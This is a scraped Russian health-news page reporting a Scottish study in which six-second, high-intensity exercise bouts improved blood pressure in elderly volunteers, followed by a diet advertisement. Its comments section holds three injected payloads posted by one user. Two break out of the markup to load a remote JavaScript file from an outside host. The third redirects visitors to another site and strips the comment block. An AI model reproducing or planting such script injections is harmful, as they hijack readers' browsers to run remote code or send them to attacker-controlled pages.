Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  6 СЕКУНД!! Столько физкул...  >>  6 СЕКУНД!! Столько физкультуры в день достаточно!
 
Обратная связь
 

6 СЕКУНД!! Столько физкультуры в день достаточно!

Размер шрифта
30 марта 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые из Шотландии пришли к выводу, что интенсивные тренировки длиной всего в шесть секунд могут значительно улучшить состояние здоровья пожилых людей, причем они помогут не только оставаться в форме, но и нормализовать артериальное давление.

6 СЕКУНД!! Столько физкультуры в день достаточно!

Ученые считают, что такой подход поможет повысить качество жизни пожилых людей, а также сократить расходы на их лечение. Их исследование еще раз подтверждает тот факт, что физические нагрузки полезны в любом возрасте, разумеется, при правильном к ним подходе.

Тренировки высокой интенсивности на сегодняшний день становятся все более популярными, ведь они дают положительные результаты наравне со стандартными тренировками, но занимают куда меньше времени. Вместо того чтобы позаниматься йогой в течение получаса или проехать пару километров на велосипеде, вам предлагается тренироваться буквально на пике ваших возможностей в течение всего нескольких минут.

Шотландские ученые провели исследование этого вопроса на группе добровольцев из числа пенсионеров. Все участники эксперимента приходили в исследовательский центр дважды в неделю в течение шести недель и занимались на велотренажере с максимальной нагрузкой в течение шести секунд. Затем они отдыхали до тех пор, пока их сердечный ритм не снижался до нормального уровня, а далее следовал еще один шестисекундный подход. Так продолжалось до тех пор, пока время интенсивной тренировки не составляло в сумме одну минуту.

Результаты, опубликованные в Journal of the American Geriatrics Society, показали, что в результате таких тренировок у участников снизилось артериальное давление (в среднем на 9%), а также повысилось насыщение мышц кислородом. Все участники отметили, что им стало легче выполнять свои ежедневные дела: например, вставать с кресла или гулять с собакой.

Доктор Бабрай считает, что преимущества такого подхода очень велики: «Многие болезни связаны именно с малоподвижным образом жизни – это и сердечные заболевания, и сахарный диабет. Регулярные физические нагрузки помогут снизить риск развития этих заболеваний».

Доктор Бабрай считает, что люди могут тренироваться с высокой интенсивностью и в домашних условиях, однако перед тем как начать они обязательно должны пройти обследование у врача, чтобы выявить возможные противопоказания. Врачи до сих пор спорят о том, какой вид тренировок более безопасен – стандартные или же высокоинтенсивные. Бабрай считает, что, хотя при высокоинтенсивных тренировках сердечный ритм наиболее высок, длительные занятия в свою очередь оказывают большую суммарную нагрузку на сердце.

Так что сколько бы лет вам ни было, не стоит пренебрегать занятиями спортом. Человек не может быть слишком стар или слаб для физических нагрузок, в том случае, если они подобраны правильно, считают ученые.

Если вы хотите реально похудеть, то специально для вас создана Диета Елены Малышевой! Уже готовая правильная еда будет доставлена вам в любое место и время. Вам останется только есть и худеть!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:23

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:21

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:16

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как добавить 20 лет к жизни   Как правильно ходить в старости   Как подготовить ноги к старости   Как вы портите свою кожу?  
30 апреля 2013Нужны ли бабушке социальные сети? Оказывается, они улучшат ее умственные способности! 01 марта 2013Почему пожилые люди так часто становятся жертвами мошенников
 
14 января 2013Ученые изобрели лекарство для лечения старческого слабоумия 12 ноября 2012Старческие болезни больше не страшны
 

Слайдшоу

1
Вы проживете до 100 лет, если ответите «да» на эти вопросы
Почему от пожилых так пахнет
Как заполучить плоский живот без особых усилий. Часть 4

Тесты

1
Как быстро вы стареете
Правильно ли вы худеете?
Легкие: что вы о них знаете?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.